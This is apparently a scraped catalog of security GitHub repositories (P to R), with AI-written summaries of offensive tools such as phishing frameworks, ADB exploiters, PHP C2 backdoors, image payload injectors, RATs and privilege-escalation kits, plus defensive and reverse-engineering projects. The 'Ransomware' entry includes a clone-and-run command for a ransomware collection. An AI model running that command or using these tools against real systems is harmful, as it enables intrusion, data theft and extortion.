phishing_catcher

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Phishing Catcher is a tool designed to identify potentially phishing domains in real-time by analyzing suspicious TLS certificate issuances reported to the Certificate Transparency Log via the CertStream API. It utilizes a configurable scoring system to evaluate domain names based on specific keywords and thresholds, allowing users to customize the sensitivity of detection. Notable features include a YAML configuration for adjustable scoring properties, support for both Python versions, and the ability to run in a Docker container for simplified deployment.

phishing-frenzy

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Phishing Frenzy is a Ruby on Rails-based framework designed for creating and managing phishing campaigns. Its primary use case is to facilitate penetration testing by simulating phishing attacks, allowing security professionals to assess and improve their organization’s defenses against such threats. Notable features include user-friendly documentation and tools for managing phishing emails and tracking user interactions.

README

Phishing Frenzy

Ruby on Rails Phishing Framework

Documentation & Info

Relevant up to date documentation can be found on the official Phishing Frenzy website located below

phoneinfoga

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: PhoneInfoga is an advanced information-gathering framework specifically designed for scanning international phone numbers. Its primary use case involves collecting detailed information such as country, area, carrier, and line type, while employing various OSINT techniques to uncover more about the phone number in question. Notable features include a graphical user interface for scans, programmatic access through a REST API, and the ability to check for the existence of a number and its associated reputation across different platforms.

PhoneSploit

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: PhoneSploit is a Python3 tool designed for remote exploitation through ADB (Android Debug Bridge), enabling users to perform a variety of actions on victim devices. Its notable features include the ability to access the device shell, capture screenshots and screen recordings, uninstall applications, and obtain system information in real time, along with file management capabilities such as pulling folders and sending files. The framework serves primarily as a penetration testing tool for assessing the security of Android devices, but it contains mandatory ethical usage disclaimers.

PhoneSploit-Pro

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: PhoneSploit Pro is an advanced Python-based tool designed for penetration testing and exploiting Android devices remotely through the Android Debug Bridge (ADB) and Metasploit Framework integration. It automates the process of creating, installing, and launching payloads to gain a Meterpreter session in a single click, along with extensive ADB functionalities for managing connected devices, such as file transfers, device control, and data extraction. Notable features include remote screen recording, SMS management, and capabilities for controlling device operations, making it a comprehensive toolkit for security assessments on Android platforms.

PHP-Antimalware-Scanner

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: PHP Antimalware Scanner is a PHP-based tool designed to scan projects for malicious code embedded within PHP files. Its primary use case is to detect potential malware through an interactive console interface or in a reporting mode that generates results in HTML or text. Notable features include customizable scanning options for file paths, action prompts upon detection of malware, and compatibility with various PHP configurations.

README

PHP Antimalware Scanner

php-spx

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: SPX (Simple Profiling eXtension) is a lightweight PHP profiling tool designed to enhance performance analysis without external dependencies, ensuring data privacy on user infrastructure. It offers seamless profiling activation, requiring minimal setup, and supports multiple metrics like execution time, memory usage, and object tracking. Its integrated web UI enables interactive visualizations, including timelines and Flamegraphs, to facilitate detailed performance insights and troubleshooting.

README

SPX - A simple profiler for PHP

phpsploit

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: PhpSploit is a full-featured Command and Control (C2) framework that maintains a persistent presence on web servers using a polymorphic PHP one-liner. Its primary use case is for penetration testing and exploitation, enabling users to execute commands, manage files remotely, interact with a SQL console, and escalate privileges through over 20 available plugins. Notable features include obfuscated communication via HTTP headers and seamless file upload/download capabilities, facilitating robust interactions with target systems while bypassing standard PHP security measures.

Phunter

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Phunter is a sophisticated tool designed for information retrieval related to phone numbers, enabling users to identify details such as the operator, potential locations, line type, and reputation. It features several capabilities including checks for spam activity, Amazon account linkage, and ownership verification, with functionality for both single-number queries and bulk processing from files. The tool is intended for educational purposes and offers a command-line interface with various output options.

pi-pwnbox-rogueap

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Pi-PwnBox is a headless Raspberry Pi-based Rogue Access Point (RogueAP) designed for conducting Red Team engagements and WiFi security assessments. It leverages Alfa WiFi USB adapters for a variety of WiFi attacks and includes features such as remote access, a comprehensive setup process, and associated WiFi hacking resources. This tool is particularly suited for on-site testing and learning environments focused on WiFi security.

README

Pi-PwnBox :rocket: -RogueAP :satellite:

Homemade (headless) PwnBox / RogueAP based on Raspberry Pi & Alfa WiFi USB Adapters.

pikachu-volleyball

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Pikachu Volleyball is a reimplementation of a classic 1997 Windows game, now developed in JavaScript for web play. Its primary use case is to provide a nostalgic gaming experience by enabling users to play volleyball with Pikachu characters while utilizing a physics engine and AI derived from reverse-engineered original machine code. Notable features include a customizable local server setup for gameplay and an extended AI vs. AI match time, allowing for continuous observation of the computer-controlled players.

PINCE

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: PINCE is a front-end tool for the GNU Project Debugger (GDB) tailored for reverse engineering, particularly in gaming contexts. Its noteworthy features include efficient memory and pointer scanning using specialized libraries, background execution for concurrent command execution, and extensive variable inspection and modification capabilities, resembling those of Cheat Engine. Additionally, PINCE supports dynamic address tables, smart casting of data types, and comprehensive disassembly functionalities, enabling users to analyze and manipulate memory with precision.

pixiewps

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Pixiewps is a C-based tool that performs offline brute-force attacks on WPS PINs utilizing the “pixie-dust attack,” allowing it to potentially recover vulnerable pins in seconds to minutes, as opposed to hours. Notably, since version 1.4, it can also retrieve WPA-PSK from passive captures and includes support for multi-threading to enhance performance. Designed primarily for educational purposes, Pixiewps requires specific input parameters related to WPS authentication, and offers various operational modes for advanced usage.

pixload

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: pixload is a set of tools designed for creating and injecting payloads into image files, supporting formats like BMP, GIF, JPG, PNG, and WebP. Its primary use case is for stealthy payload delivery, enabling users to embed malicious code within legitimate image files while maintaining their validity. Notable features include straightforward command-line usage for various image types and integration with Metasploit for payload generation.

README

pixload – Image Payload Creating tools

DESCRIPTION

Set of tools for ~~hiding backdoors~~ creating/injecting payload into images.

plasma

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: PLASMA is an interactive disassembler that converts binary code into more readable assembly language with syntax highlighting, supporting architectures such as x86_64, ARM, and MIPS, along with ELF and PE formats. Its notable features include a Python API for scripting capabilities, allowing users to perform tasks like pseudo-decompilation, flow graph manipulation, and code assembly. The tool is currently under development and offers additional functionality through optional libraries for enhanced features.

Platypus

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Platypus is a modern terminal-based tool for managing multiple reverse shell sessions and clients, implemented in Go. Its primary use case is to facilitate secure and efficient reverse shell connections across various protocols, featuring functionalities such as multiple service listening ports, a RESTful API for management, file download/upload capabilities, and an interactive shell interface that supports common control commands. Notable features include automatic server initiation, port forwarding, and a web UI for enhanced usability.

PoC

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Proofs-of-concept

Proofs-of-concept

POC-T

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: POC-T (Pentest Over Concurrent Toolkit) is a versatile framework designed for penetration testing that facilitates concurrent tasks such as data collection, web crawling, brute-force attacks, and bulk PoC management. Its notable features include support for both multithreading and Gevent concurrency modes, simplified script writing without extensive documentation, built-in script extensions, and integration with popular search engine APIs like ZoomEye, Shodan, and Google.

README

POC-T: Pentest Over Concurrent Toolkit

PocOrExp_in_Github

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: PocOrExp in Github is a tool designed for aggregating proof of concepts (PoCs) and exploitation scripts (Exp) associated with Common Vulnerabilities and Exposures (CVE) directly from GitHub. Its primary use case is to assist cybersecurity professionals in quickly locating relevant PoCs by year and monitoring updates for existing vulnerabilities. Notable features include year-specific data retrieval, initialization options to avoid processing handled CVEs, and the ability to track changes to PoCs over time.

pocsuite3

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: pocsuite3 is an open-source framework designed for remote vulnerability testing and proof-of-concept (PoC) development, focused on empowering penetration testers and security researchers. Notable features include a versatile PoC engine supporting multiple execution modes, dynamic loading of PoC scripts and targets from various sources, as well as comprehensive integration with tools like Seebug, Shodan, and ZoomEye. The tool also offers robust capabilities such as plugin support, multi-target loading, and HTTP/SOCKS proxy configuration, making it a powerful asset in the security testing arsenal.

pokecrystal

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Pokémon Crystal repository consists of a comprehensive disassembly of the Pokémon Crystal game, designed to facilitate the building of various ROM versions. Primary use cases include reverse engineering, modding, and development of patches for the game, supported by resources such as documentation and tutorials. Notable features include the ability to produce different ROM versions and access to a community-driven platform for additional support and collaboration.

README

Pokémon Crystal

This is a disassembly of Pokémon Crystal.

pokeemerald

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Pokémon Emerald is a decompilation project that allows users to build the ROM file for the Pokémon Emerald game. Its primary use case is for developers and enthusiasts looking to analyze, modify, or enhance the original game code. Notable features include the ability to reconstruct the game’s ROM and support for custom modifications.

README

Pokémon Emerald

This is a decompilation of Pokémon Emerald.

It builds the following ROM:

pokefirered

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Pokémon FireRed and LeafGreen repository provides a comprehensive decompilation of the popular Pokémon games, enabling users to create various ROM images of FireRed and LeafGreen. Its primary use case is for game developers and modders looking to analyze, modify, or enhance the original games. Notable features include the generation of multiple ROM versions, including revisions and switch-compatible formats, along with detailed SHA1 checksums for verification.

README

Pokémon FireRed and LeafGreen

This is a decompilation of English Pokémon FireRed and LeafGreen.

pokered

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Pokémon Red and Blue repository provides a disassembly of the original Pokémon games, allowing users to rebuild the ROMs for both Pokémon Red and Blue, along with additional debug versions and patches. Its primary use case is for developers and enthusiasts looking to study, modify, or enhance the original game code, supported by extensive documentation and tutorials through its Wiki. Notable features include automated builds and a structured community for collaboration on Discord.

pokeruby

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Pokémon Ruby and Sapphire is a comprehensive disassembly of the Game Boy Advance titles Pokémon Ruby and Sapphire, enabling developers to understand and modify the game’s code. The primary use case focuses on ROM development and enhancement, allowing users to compile the original game files, pokeruby.gba and pokesapphire.gba. Notable features include built-in support for building ROMs, making it an essential tool for enthusiasts involved in Pokémon game development and reverse engineering.

pokeyellow

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Pokémon Yellow is a disassembly repository for the classic Game Boy Color game, allowing users to build various ROMs, including the standard Pokémon Yellow and a debug version named YELLMONS.GB. The tool provides comprehensive documentation, symbol information, and assembly tools to facilitate modifications and development for enthusiasts. Notable features include the ability to generate different ROM formats and a supportive community for collaborative development and troubleshooting.

README

Pokémon Yellow

This is a disassembly of Pokémon Yellow.

Pompem

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Find exploit tool

Find exploit tool

power-pwn

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Power Pwn is a comprehensive offensive and defensive security toolset designed for the Microsoft 365 Power Platform and AI services. It includes multiple features such as tenant scanning with PowerDump, backdoor deployment, malware creation without coding, and tools for phishing and misconfiguration testing, providing users with extensive capabilities for security assessment and exploitation in Power Platform environments. Additionally, it offers utilities for enumerating custom GPTs and publicly exposed AI services, enhancing its utility for security professionals.

Powerful-Plugins

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Powerful Plugins is a curated collection of open-source plugins designed to enhance various frameworks and tools such as BurpSuite, Chrome, Firefox, IDA, Immunity, OllyDbg, and the Volatility Framework. Its primary use case is to extend the functionality of these platforms, enabling improved capabilities in tasks such as web application security testing and memory analysis. Notable features include the diverse range of supported tools and the invitation for community contributions to further expand the repository.

PowerHub

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: PowerHub is a post-exploitation tool designed for PowerShell, facilitating the transfer of potentially flagged data during penetration testing engagements. Its notable features include being fileless and stateless, utilizing cert pinning and RC4 encryption for string obfuscation, allowing seamless execution of C# programs in memory, and offering multiple methods to bypass AMSI. The tool simplifies processes such as running scripts and transferring sensitive information like Kerberos tickets or passwords, either through command line or a web interface, enhancing collaboration for testing teams.

PowerShell-for-Hackers

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: PowerShell for Hackers is a repository of customizable PowerShell functions designed to aid in developing payloads for security testing and ethical hacking. Key features include a variety of functions with descriptions, usage examples, and accompanying video tutorials, which facilitate the creation of payloads for diverse scenarios such as system manipulation, desktop interactions, and data concealment. This collection emphasizes community collaboration, allowing users to contribute their own functions.

README

2022 Hak5 hacker of the Year

Powershell-RAT

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Powershell-RAT is a Python-based remote access tool designed for red team engagements to backdoor Windows machines. Its primary use case involves tracking user activity through screen captures and exfiltrating data via email attachments using Gmail. Key features include stealthy operation, the ability to execute tasks such as taking screenshots and scheduling tasks, and a comprehensive “Hail Mary” option for automated execution.

README

Powershell-RAT

Python based backdoor that uses Gmail to exfiltrate data as an e-mail attachment.

pretender

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: pretender is a versatile tool designed for executing man-in-the-middle (MitM) attacks by spoofing local name resolutions and performing DHCPv6 DNS takeover. It specializes in relaying attacks primarily against Windows hosts, leveraging protocols such as mDNS, LLMNR, and NetBIOS-NS spoofing. Notable features include the ability to log network queries in dry run mode, tailored domain responses, and integration with relaying tools like Impacket’s ntlmrelayx.py and krbrelayx.

README

pretender

Your MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover
as well as mDNS, LLMNR and NetBIOS-NS spoofing

privacy-respecting

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The “Privacy Respecting” repository is a curated list of services and software alternatives that prioritize user privacy, aiming to offer users choices away from platforms that collect extensive personal data. It categorizes privacy-focused options across various domains such as search engines, social networks, and cloud storage, while providing insights on the implications of using mainstream services. Notable features include detailed explanations for suggested alternatives and a structured format for easy navigation through the listed services.

privacy.sexy

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: privacy.sexy is a cross-platform tool designed to enforce privacy and security best practices on Windows, macOS, and Linux systems. Its notable features include integration with unit, integration, and end-to-end testing workflows, as well as security checks for dependencies using Static Analysis Security Testing (SAST), ensuring a robust and secure user experience.

README

privacy.sexy — Privacy is sexy

Enforce privacy & security best-practices on Windows, macOS and Linux, because privacy is sexy.

PrivEsc

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: PrivEsc is a collection of privilege escalation scripts and exploits designed for Windows, Linux, and MySQL environments. Its primary use case is to help security professionals identify and exploit privilege escalation vulnerabilities in various systems. Notable features include compatibility with multiple operating systems and exploitation capabilities tailored for common service vulnerabilities.

README

PrivEsc by 1N3@CrowdShield

http://crowdshield.com

ABOUT:

A collection of Windows, Linux and MySQL privilege escalation scripts and exploits.

PrivescCheck

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: PrivescCheck is a PowerShell script designed for identifying common Windows vulnerabilities and configuration issues outside the scope of public security standards, facilitating exploitation and post-exploitation tasks. It allows users to run various checks—including basic, extended, and audit checks—generate human-readable reports in multiple formats (TXT, HTML, CSV, XML), and includes options for silent execution and risky checks, making it suitable for penetration testing, research, and auditing purposes. Notably, the tool performs context-aware access control checks to provide accurate findings based on the current user’s privileges.

Privilege-Escalation

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Privilege Escalation is a comprehensive cheat sheet and reference guide tailored for penetration testers, CTF participants, and cybersecurity students, focusing on methods to escalate privileges in compromised systems. This tool includes a wealth of exploitation techniques, such as abusing sudo rights, exploiting SUID bits, and identifying vulnerable Docker instances, alongside detailed enumeration and exploitation methods. Notable features include practical examples, links to external resources, and an organized structure for efficient referencing in both educational and professional penetration testing scenarios.

project-restoration

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Project Restoration is a patch for Majora’s Mask 3D that reintroduces mechanics from the original game while resolving gameplay issues to enhance player experience. Notable features include an improved swimming mechanic for Zora Link, adjustments to the Inverted Song of Time’s effect, and modifications to the Twinmold battle for clarity and pacing. The project aims to blend the best aspects of the original game with the enhanced graphics of the remaster, ensuring a polished gameplay experience without game-breaking issues.

protobuf-inspector

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: protobuf-inspector is a command-line tool designed to parse Google Protobuf encoded blobs (versions 2 and 3) without requiring their corresponding definitions. It outputs a structured representation of the blob’s content, including inferred types and potential parsing errors, making it useful for developers working with Protobuf data or engaging in reverse-engineering tasks. Notable features include the ability to detect structure dynamically, handle embedded messages, and support raw data extraction for in-depth analysis.

prowler

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Prowler is an open-source cloud security platform that automates security assessments and compliance checks across various cloud environments. It features hundreds of customizable security checks and integration capabilities, enabling organizations to implement real-time monitoring and remediation for enhanced cloud security. Designed for scalability and cost-effectiveness, Prowler simplifies the complexities of cloud security management for organizations of all sizes.

README

Prowler is the Open Cloud Security platform trusted by thousands to automate security and compliance in any cloud environment. With hundreds of ready-to-use checks and compliance frameworks, Prowler delivers real-time, customizable monitoring and seamless integrations, making cloud security simple, scalable, and cost-effective for organizations of any size.

PS2Recomp

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: PS2Recomp is an experimental static recompiler for PlayStation 2 ELF binaries that translates MIPS R5900 instructions into C++ code. Its primary use case involves recompiling and executing PS2 games while allowing configuration for stubs, skips, and instruction patches. Notable features include customizable syscall handling, support for PS2-specific macros, and integration with Ghidra for efficient function export and mapping.

README

PS2Recomp: PlayStation 2 Static Recompiler (Experimental)

Also check our WIKI

PsMapExec

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: PsMapExec is a PowerShell-based post-exploitation framework designed to facilitate penetration testing within Active Directory environments. It offers enhancements over similar tools like CrackMapExec and NetExec, allowing for comprehensive Active Directory enumeration and management with a user-friendly interface. The tool is self-contained, making it suitable for use in restricted environments, and emphasizes adherence to ethical guidelines and consent when utilized for security assessments.

README

PsMapExec

pspy

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: pspy is an unprivileged Linux process monitoring tool that allows users to observe commands executed by other processes, including cron jobs, in real-time without requiring root access. It leverages procfs scans and inotify filesystem watchers to detect short-lived processes and can be particularly useful for system enumeration in Capture The Flag (CTF) challenges, as well as for demonstrating secure coding practices regarding command-line argument handling. Notable features include customizable process and filesystem event monitoring, with options for output formatting and scan intervals.

psudohash

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Psudohash is a customizable password list generator designed for orchestrating brute force attacks and cracking hashes by mimicking human password creation patterns. Key features include in-order and all-order combinations of keyword permutations, leet character substitution, common padding value additions, and filtering options based on word length, making it particularly effective for pentesting corporate environments where standard naming conventions are often used in passwords.

README

psudohash

Cool New Features of v1.1.0

Special thanks to DavidAngelos:
▶️ Added a progress bar in every step to track execution.
▶️ Added options:

pwn_jenkins

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Pwn_jenkins is a tool designed for exploiting various remote code execution vulnerabilities within Jenkins instances, specifically targeting misconfigurations and outdated versions. It enables authenticated and unauthenticated access to sensitive files, allows for arbitrary command execution via deserialization exploits, and identifies authentication bypass issues through crafted requests. Notable features include support for multiple CVEs, including CVE-2014-23897 and CVE-2019-1003002, making it a comprehensive toolkit for assessing the security of Jenkins environments.

pwnagotchi

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Pwnagotchi is a Raspberry Pi-based tool designed for capturing WPA key material from Wi-Fi networks using passive and active techniques, generating PCAP files compatible with hashcat for cracking. Notable features include the ability to perform full and half WPA handshake captures, utilize PMKID attacks, and facilitate communication between multiple Pwnagotchi units through a custom protocol. The tool has removed AI components to enhance stability and battery life during operation.

pwncat

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Pwncat is a powerful networking tool that enhances the capabilities of traditional netcat by incorporating advanced features such as evasion techniques for firewalls and intrusion detection/prevention systems, along with support for both bind and reverse shells. Its self-injecting shell functionality and extensive scripting support using Python make it particularly effective for penetration testing and exploitation scenarios. Notably, it facilitates seamless port forwarding and maintains a user-friendly interface for enhanced usability in complex network environments.

pwndbg

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Pwndbg is a Python module designed as a plugin for GDB and LLDB, enhancing the debugging experience for developers working on low-level software, reverse engineering, and exploit development. Its primary use case is to streamline common debugging tasks by providing user-friendly features and a suite of utilities that address the shortcomings of vanilla GDB and LLDB. Notable features include an improved hexdump command, a clean interface for quick navigation, and a range of custom tools to facilitate debugging across different platforms and architectures.

pwnedOrNot

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: pwnedOrNot is an OSINT tool designed to check if email accounts have been compromised and retrieve associated passwords from public data dumps. It leverages the HaveIBeenPwned v3 API for initial breach verification and subsequently searches for compromised passwords. Key features include detailed breach information, the ability to filter results by domain, and support for batch processing of multiple email addresses.

README

OSINT Tool for Finding Passwords of Compromised Email Accounts

Created by Lohitya Pushkar (thewhiteh4t).
Twitter - Blog

pwninit

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: pwninit is a tool designed to automate the setup for binary exploitation challenges by preparing the necessary executables and library files. Key features include the ability to set the challenge binary as executable, download an appropriate linker and debug symbols, patch the binary using patchelf, and generate a customizable pwntools solve script. This streamlines the initial configuration process for security professionals and students engaging in binary exploitation tasks.

PyArmor-Unpacker

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: PyArmor-Unpacker is a tool designed to unpack Python applications protected by PyArmor, specifically targeting versions prior to v8. The tool offers three methods for unpacking, with the preferred method being suitable for Python 3.9, allowing users to retrieve the original code from obfuscated .pyc files. Notable features include a detailed usage guide, support for multiple unpacking methods, and an emphasis on community contributions to address known issues and enhance functionality.

pygod

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: PyGOD is a Python library designed for graph outlier detection, enabling users to identify anomalies in various structures such as social networks and security systems. It offers over ten detection algorithms, maintains a unified API for ease of use, and supports multiple levels of outlier detection (node, edge, and graph-level) while being compatible with PyTorch Geometric. Key features include scalable design for large graph processing, comprehensive documentation, and streamlined data handling with PyG data objects.

pyinstxtractor

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: PyInstaller Extractor is a Python script designed to extract the contents of executables created with PyInstaller, including fixed headers for bytecode decompilation. It supports a wide range of PyInstaller versions and can handle both Windows and Linux binaries, enabling users to recover files from packaged applications efficiently. Notable features include seamless integration with Python 2.x and 3.x environments, as well as compatibility with various bytecode decompilers for further analysis.

pylingual

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: PyLingual is a Python bytecode decompiler specifically designed for versions 3.6 and later, allowing users to convert Python bytecode back into source code. Notable features include the ability to run locally or through a web service, support for different Python versions via pyenv, and adjustable options for decompilation settings, such as output directory and segmentation preferences. This tool is optimized for readability and extensibility, though it may initially exhibit some control flow accuracy regressions compared to its web service counterpart.

pypush

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: pypush is an evolving library designed for interfacing with Apple’s internal API, specifically focusing on the client side of the Apple Push Notification service (APNs). Its primary use case is to enable applications to impersonate Apple devices and receive push notifications while facilitating reverse-engineering efforts related to iMessage and other APIs. Notable features include platform independence and a planned expansion to include a wider range of Apple’s API functionalities as development progresses.

pythem

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: pythem is a versatile penetration testing framework written in Python, designed for use by security researchers and professionals to conduct various security assessments within legal boundaries. Notable features include support for attacks such as ARP spoofing, DNS manipulation, brute force attacks on SSH and web forms, as well as tools for exploit development and packet filtering. The framework can be installed on Debian-based Linux distributions, or run as a Docker container, facilitating accessibility and ease of deployment.

QBDI

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: QBDI is a modular dynamic binary instrumentation (DBI) framework designed for cross-platform and cross-architecture use, supporting various operating systems including Linux, macOS, Android, iOS, and Windows. It provides C/C++ APIs along with Python and JavaScript bindings, facilitating scripting while integrating seamlessly with external injection tools like Frida. Notable features include the ability to instrument binaries without a preferred injection method and an LD_PRELOAD-based injector for dynamic executables on Linux and macOS, although it currently does not support multithreading or C++ exception handling.

QP-Gallery-Releases

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: QuickPic Gallery Mod is a modernized version of the classic QuickPic Gallery application, designed for Android platforms with API level 23 and above. This tool emphasizes speed, stability, and simplicity, featuring multiple bug fixes, enhanced compatibility with recent Android versions, and a refreshed Material 3 design while maintaining its lightweight and offline-first experience.

README

QuickPic Gallery Mod

A modernized version of the classic QuickPic Gallery, focused on speed, stability, and simplicity. It includes multiple bug fixes, improved compatibility with recent Android versions, and a refreshed Material 3 design — while preserving the lightweight, fast, and offline-first experience of the original app.

Qu1cksc0pe

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Qu1cksc0pe is a comprehensive malware analysis tool designed to analyze various file types, including Windows executables, Linux binaries, Android APKs, and email files, utilizing both static and dynamic analysis methods. It provides detailed insights such as DLL usage, API functions, embedded executables, and MITRE ATT&CK mappings, facilitating in-depth evaluation of potentially malicious files. The tool also features a user-friendly web interface and robust error handling to enhance usability, especially within different operating system environments.

quark-engine

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Quark Engine is a comprehensive tool designed for malware family analysis and vulnerability assessment, particularly in the context of Android malware. Its primary use case involves identifying and reporting on various malware behaviors and signatures, enabling security researchers to assess risks and improve defenses. Notable features include detailed analysis reports, a rule-based scoring system for malware, and compatibility with Python 3.10, making it accessible for developers and cybersecurity professionals.

Raccoon

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Raccoon is an offensive security tool designed for reconnaissance and information gathering, offering a wide range of features like DNS enumeration, WHOIS lookup, TLS data analysis, port scanning, and directory fuzzing. With support for asynchronous scanning via Python’s asyncio and anonymity through Tor/proxies, it provides efficient and robust scanning capabilities while organizing outputs by target and scan type. Additionally, it leverages default wordlists from SecLists for various reconnaissance tasks, enhancing its operational effectiveness.

radare2-book

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The r2book is a collaboratively maintained documentation resource for the Radare2 reverse engineering framework, serving as an updated version of the original radare1 book. Its primary use case is to provide users with comprehensive information and guidance on utilizing Radare2 effectively, while notable features include community contributions for continuous content improvement and online accessibility.

README

r2book

This book is an updated version maintained by the community of the original radare1 book written by pancake.

RamiGPT

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: RamiGPT is an AI-driven offensive security tool that facilitates privilege escalation to root accounts using OpenAI’s technology and PwnTools. Its primary use case involves quickly exploiting vulnerabilities across various systems, achieving root access in under a minute, as demonstrated by its performance on multiple VulnHub scenarios. The tool features a user-friendly GUI and seamless integration with Docker for easy deployment and configuration, leveraging tools like BeRoot and LinPEAS for effective enumeration.

randar-explanation

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Randar is a Minecraft exploit targeting versions Beta 1.8 to 1.12.2 that uses LLL lattice reduction to manipulate the game’s random number generator, java.util.Random, allowing attackers to derive the precise coordinates of other players’ locations based on item drop positions from mined blocks. The exploit hinges on a vulnerability in the game’s code, where improper reuse of RNG instances can be exploited to track players across vast distances, making it particularly significant on anarchic servers like 2b2t, where player anonymity and location security are critical. Notable features include the ability to reverse-engineer the RNG state to pinpoint player coordinates efficiently and the reliance on advanced mathematical techniques to achieve this.

Ransomware

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Ransomware collection repository provides a suite of ransomware scripts designed for educational and testing purposes. Users are cautioned against executing these scripts on their devices due to their malicious nature. Key features include compatibility with multiple operating systems such as Termux, Kali Linux, Ubuntu, and others, thereby making it a versatile tool for research and development in cybersecurity contexts.

README

☣️ Ransomwares Collection ☣️

- Don't Run Them on Your Device. - Handle with caution
💿 Installation 💿

git clone https://github.com/Err0r-ICA/Ransomware
cd Ransomware
python3 Ransomware

Ransomware-Tool-Matrix

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Ransomware Tool Matrix repository provides an extensive catalog of tools utilized by various ransomware gangs, enabling cybersecurity defenders to identify and mitigate threats effectively. This resource can be leveraged for threat hunting, incident response, and adversary emulation by tracking the tools’ usage patterns and associated tactics, techniques, and procedures (TTPs). Notable features include categorized lists of tools—including those for credential theft, defense evasion, and networking—as well as links to relevant threat intelligence reports and resources.

rapidscan

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: RapidScan is a multifaceted web vulnerability scanner that automates the execution of various security scanning tools to efficiently uncover and assess vulnerabilities in web applications. Notable features include its one-step installation, support for multiple tools like nmap and nikto, the ability to correlate results to reduce false positives, and the provision of detailed vulnerability definitions and remediation strategies. The tool is designed to streamline the penetration testing process, saving valuable time while offering comprehensive reporting and future plans for AI-driven tool deployment based on detected issues.

raven

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Raven is a developer security tool designed to enhance the security of software projects by providing capabilities for managing and monitoring secrets, vulnerabilities, and compliance across development environments. Its primary use case is to integrate seamlessly into CI/CD pipelines, ensuring that code remains secure throughout the software development lifecycle. Notable features include real-time detection of security risks, a user-friendly interface, and integration with various popular development tools and platforms.

readpe

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: readpe is a comprehensive command line toolkit designed for the analysis and manipulation of PE (Portable Executable) binaries across multiple platforms. Its primary use case involves providing developers and security analysts with tools to inspect, modify, and understand the structure of PE files. Notable features include easy installation and building on various operating systems, as well as its background as a successor to the original pev tool, with enhanced functionality integrated into a single repository.

ReC98

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: ReC98 is a reverse-engineering project that aims to reconstruct the source code of the first five Touhou Project games originally released for the NEC PC-9801 system. It allows for perfect replications of the original binaries, thus maintaining the integrity of the source while enabling modding and porting efforts by providing a comprehensible codebase. Notable features include the preservation of the original game’s mechanics, position independence, and support for community modifications.

Recaf

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Recaf is a modern Java bytecode editor designed to simplify the editing and manipulation of Java and Android bytecode by abstracting complex details. Key features include a user-friendly interface, support for multiple decompilers, built-in bytecode compiling and assembling, advanced search capabilities, and tools for code deobfuscation. Additionally, it allows users to script and extend functionality through plugins, and can operate as a command line application for automated processes.

reconmap

Mon, 30 Mar 2026 00:00:00 +0000

